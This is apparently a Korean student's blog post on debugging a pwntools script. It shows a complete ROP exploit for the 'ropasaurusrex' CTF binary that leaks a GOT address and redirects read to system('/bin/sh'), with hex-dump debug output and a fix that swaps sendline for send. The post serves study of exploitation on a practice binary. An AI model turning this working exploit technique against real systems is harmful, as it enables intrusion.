python code debugging

python 코드 디버깅할때 다음과 같은 멍령어 치면 됨.

n9ne@ubuntu [ ~/BOF/rop ] python exploit.py DEBUG

공부하다가 선배한테 leak해서 알아냄.
아래는 문제 풀다가 안될때 디버깅 사용해서 푼 예시이다.

---

ropasaurusrex

exploit.py

#!/usr/bin/python
from pwn import *

read_plt = 0x804832c
read_got = 0x804961c
write_plt = 0x804830c
bss = 0x8049620
dynamic = 0x8049530
pppr = 0x80484b6
read_system = 0x9d0d0
bin_sh = "/bin/sh"
bin_sh_len = len(bin_sh)

payload = "A"*140

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0x0)
payload += p32(dynamic)
#payload += p32(bss)
payload += p32(bin_sh_len)

payload += p32(write_plt)
payload += p32(pppr)
payload += p32(0x1)
payload += p32(read_got)
payload += p32(0x4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0x0)
payload += p32(read_got)
payload += p32(0x4)

payload += p32(read_plt)
payload += "AAAA"
#payload += p32(bss)
payload += p32(dynamic)

p = process("./ropasaurusrex")
print "read_plt: "+hex(read_plt)
print "read_got: "+hex(read_got)
print "write_plt: "+hex(write_plt)
print "bss: "+hex(bss)
print "dynamic: "+hex(dynamic)
print "pppr: "+hex(pppr)
p.sendline(payload)
p.sendline(bin_sh)

real_got = u32(p.recv(4))
print "read_read_got: "+hex(real_got)

system = real_got - read_system
print "system: "+hex(system)

p.sendline(p32(system))
p.interactive()

소스코드를 볼때는 문제가 없어 보이는데 쉘이 안따진다.
그리고 core파일도 생성이 안되서 어디서 Segmentation Fault 가 나는지 모르겠다.
pwntools 사용할때 core파일 생성시키는 방법도 알아야 하는데...
그건 이거 정리하고 공부해야지

여튼 어디서 안되는건지 디버깅 해보자!

---

 n9ne@ubuntu [ ~/BOF/rop ] python exploit.py DEBUG
[+] Starting local process './ropasaurusrex': pid 27844
read_plt: 0x804832c
read_got: 0x804961c
write_plt: 0x804830c
bss: 0x8049620
dynamic: 0x8049530
pppr: 0x80484b6
[DEBUG] Sent 0xd5 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000080  41 41 41 41  41 41 41 41  41 41 41 41  2c 83 04 08  │AAAA│AAAA│AAAA│,···│
    00000090  b6 84 04 08  00 00 00 00  30 95 04 08  07 00 00 00  │····│····│0···│····│
    000000a0  0c 83 04 08  b6 84 04 08  01 00 00 00  1c 96 04 08  │····│····│····│····│
    000000b0  04 00 00 00  2c 83 04 08  b6 84 04 08  00 00 00 00  │····│,···│····│····│
    000000c0  1c 96 04 08  04 00 00 00  2c 83 04 08  41 41 41 41  │····│····│,···│AAAA│
    000000d0  30 95 04 08  0a                                     │0···│·│
    000000d5
[DEBUG] Sent 0x8 bytes:
    '/bin/sh\n'
[DEBUG] Received 0x4 bytes:
    00000000  e0 e3 6a f7                                         │··j·││
    00000004
read_read_got: 0xf76ae3e0
system: 0xf7611310
[DEBUG] Sent 0x5 bytes:
    00000000  10 13 61 f7  0a                                     │··a·│·│
    00000005
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
[*] Process './ropasaurusrex' stopped with exit code -11 (SIGSEGV) (pid 27844)
[*] Got EOF while sending in interactive

이 exploit code가 실행되면서 Sent한 값이나 Received한 값이 전부 다 나온다.

p.sendline(p32(system))

[DEBUG] Sent 0x5 bytes:
    00000000  10 13 61 f7  0a                                     │··a·│·│
    00000005

내가 확인해본 바로는 p.sendline()에서 '\n' 때문에 0a까지 send해서 인자에서 Segmentation Fault가 발생하는듯 하다.
그래서 p.sendline()대신 p.send()로 바꿔서 해봤다.

n9ne@ubuntu [ ~/BOF/rop ] python exploit.py
[+] Starting local process './ropasaurusrex': pid 45840
read_plt: 0x804832c
read_got: 0x804961c
write_plt: 0x804830c
bss: 0x8049620
dynamic: 0x8049530
pppr: 0x80484b6
read_read_got: 0xf76d43e0
system: 0xf7637310
[*] Switching to interactive mode
$ id
uid=1000(n9ne) gid=1000(n9ne) groups=1000(n9ne)
$ 

정상적으로 exploit에 성공!